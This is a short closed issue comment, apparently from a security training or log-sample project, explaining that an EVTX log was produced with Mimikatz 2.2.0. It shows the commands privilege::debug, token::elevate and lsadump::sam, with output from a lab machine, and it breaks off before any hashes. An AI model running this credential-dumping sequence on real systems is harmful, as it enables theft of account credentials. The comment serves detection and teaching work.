Closed joswr1ght closed 5 years ago
The EVTX is from Mimikatz 2.2.0, standard hashdump route:
```
C:\Tools\mimikatz>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #17763 Apr 28 2019 22:07:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

536 {0;000003e7} 1 D 36609 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
 -> Impersonated !
 * Process Token : {0;0001e3dd} 1 F 5190434 SEC504STUDENT\Sec504 S-1-5-21-2977773840-2930198165-1551093962-1000 (15g,24p) Primary
 * Thread Token : {0;000003e7} 1 D 5221712 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : SEC504STUDENT
SysKey : e2a5379f049ff5f37e322618f569e020
Local SID : S-1-5-21-2977773840-2930198165-1551093962
```